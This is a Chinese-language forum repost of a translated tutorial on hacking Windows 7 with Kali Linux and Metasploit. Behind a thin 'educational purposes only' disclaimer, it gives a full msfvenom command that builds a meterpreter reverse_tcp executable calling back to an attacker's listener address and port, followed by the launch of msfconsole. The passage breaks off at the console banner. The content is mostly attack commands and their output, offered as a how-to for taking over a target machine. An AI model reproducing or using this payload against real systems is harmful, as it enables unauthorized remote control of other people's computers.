发帖
扫码访问
 注册
 登录
首页 存档 技术 查看内容

如何使用 Kali Linux 黑掉 Windows

2018-3-30 13:00 |来自: 互联网 890 0

摘要: 请注意,我写这篇文章只是出于教育目的哦一切因此带来的后果和本文作者、译者无关。-- Manmohan Mirkar 本文导航 -源机器详情07% -步骤 1:创建 Payload 程序12% -步骤 2:运行 mfsconsole 命令启动 msf 命令窗口25% ...

请注意,我写这篇文章只是出于教育目的哦一切因此带来的后果和本文作者、译者无关。
-- Manmohan Mirkar

编译自:http://www.linuxroutes.com/quick-guide-how-to-hack-windows-with-kali-linux/
作者: Manmohan Mirkar
译者: GHLandy


Kali Linux 派生自 Debian Linux,主要用于渗透测试,拥有超过 300 个的预安装好的渗透测试工具。Metasploit 项目中 Metasploit 框架支持 Kali Linux 平台,Metasploit 是一个用于开发和执行安全利用代码security exploit的工具。让我们来使用 Kali Linux 来攻破 Windows 吧。请注意,我写这篇文章只是出于教育目的哦一切因此带来的后果和本文作者、译者无关。

源机器详情

Kali Linux

    

  1. root@kali:/# uname -a
    2. 

  2. Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
    3. 

  3. root@kali:/#
    4.

用做攻击对象的目标机器:

  1. Windows 7 Ultimate SP1

步骤 1:创建 Payload 程序

Payload 是一个类似于病毒或者木马的程序,可以运行在远程目标上 为了黑掉那台机器。可以通过以下命令来创建 Payload(program.EⅩE),以便能使用 Kali Linux 黑掉 Windows。

    

  1. root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe
    2. 

  2. No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    3. 

  3. No Arch selected, selecting Arch: x86 from the payload
    4. 

  4. No encoder or badchars specified, outputting raw payload
    5. 

  5. Payload size: 333 bytes
    6. 

  6. Final size of exe file: 73802 bytes
    7. 

  7. Saved as: /root/program.exe
    8. 

  8. root@kali:/# ls -la /root/program.exe
    9. 

  9. -rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe
    10.

通过ls命令,我们可以确认 Payload 程序是否成功生成在指定的位置。

步骤 2:运行mfsconsole命令启动 msf 命令窗口

    

  1. root@kali:# msfconsole
    2. 

    3. 

    4. 

  4.                   .,,.         .
    5. 

  5.                 .\$$$$$L..,,==aaccaacc%#s$b.    d8,  d8P
    6. 

  6.            d8P    #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.  `BP d888888p
    7. 

  7.          d888888P   '7$$$$\""""''^^`` .7$$$|D*"'```     ?88'
    8. 

  8.  d8bd8b.d8p d8888b ?88' d888b8b      _.os#$|8*"`  d8P    ?8b 88P
    9. 

  9.  88P`?P'?P d8b_,dP 88P d8P' ?88    .oaS###S*"`    d8P d8888b $whi?88b 88b
    10. 

  10.  d88 d8 ?8 88b   88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
    11. 

  11. d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`  `?88' ?88 ?88 88b d88 d88
    12. 

  12.              .a#$$$$$$"`     88b d8P 88b`?8888P'
    13. 

  13.             ,s$$$$$$$"`       888888P'  88n   _.,,,ass;:
    14. 

  14.           .a$$$$$$$P`        d88P'  .,.ass%#S$$$$$$$$$$$$$$'
    15. 

  15.          .a$###$$$P`      _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
    16. 

  16.        ,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
    17. 

  17.       .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
    18. 

  18. _______________________________________________________________  ,
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过
雷人
握手
鲜花
鸡蛋
收藏 分享 邀请
上一篇:比较Python命令行解析库 Argparse、Docopt与Click下一篇:Docker 是什么?

相关分类

返回顶部